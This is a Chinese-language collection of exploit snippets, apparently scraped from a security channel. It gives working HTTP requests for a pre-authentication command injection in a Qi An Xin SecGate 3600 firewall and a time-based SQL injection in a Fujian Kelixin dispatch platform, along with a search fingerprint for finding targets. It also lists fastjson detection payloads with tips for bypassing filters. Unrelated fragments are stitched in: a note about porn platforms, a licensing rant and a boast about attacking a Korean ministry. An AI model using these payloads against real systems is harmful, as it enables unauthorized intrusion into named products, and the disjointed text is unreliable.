奇安信网神SecGate 3600 A1500 防火墙存在前台命令执行漏洞

POST /cgi-bin/sysTools/sysToolsDetectNet.cgi HTTP/1.1Host: xxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/plain, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequesttargetHost=|ping|

自我介绍

fastjson默认配置测试版本payload

payload 1(dns请求)【fastjson>=1.2.37】

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://§1§.{{URL}}"}}""}

1.2.37-1.2.83版本

payload 2(dns请求)【fastjson>=1.2.37】

{{"@type":"java.net.URL","val":"http://§1§.{{URL}}"}:0

1.2.37-1.2.83版本

bypass字符，\a、\n、\b、\r、\f、\t 等，十六进制编码。把字符串中的0x07以及0x0b去除，可以加在"@type":"java.net.InetSocketAddress"不影响json的解析，反之，则会造成500错误

poc2jar工具里也有json漏洞poc能做大致判断
https://github.com/f0ng/poc2jar

3月15日，91短视频官方、51成人漫画、海角乱伦社区官方等色情平台在X上对河北邯郸霸凌事件表态

https://mp.weixin.qq.com/s/LhRHy9aHphXopZBdoF6ILg

哈批，一堆免费的还让你圈上了
人家github开源工具允许你免费下载用允许你转手拿来商用吗

福建科力信通信指挥调度平台down_file.php sql注入漏洞

body="app/structure/departments.php" || app="指挥调度管理平台"

GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksjUpgrade-Insecure-Requests: 1

https://mp.weixin.qq.com/s/tUhpyH7aMr1NhM9JhImqlg

我特么当年要是有这后渗透的技术棒子交通部早没了🤬

？？？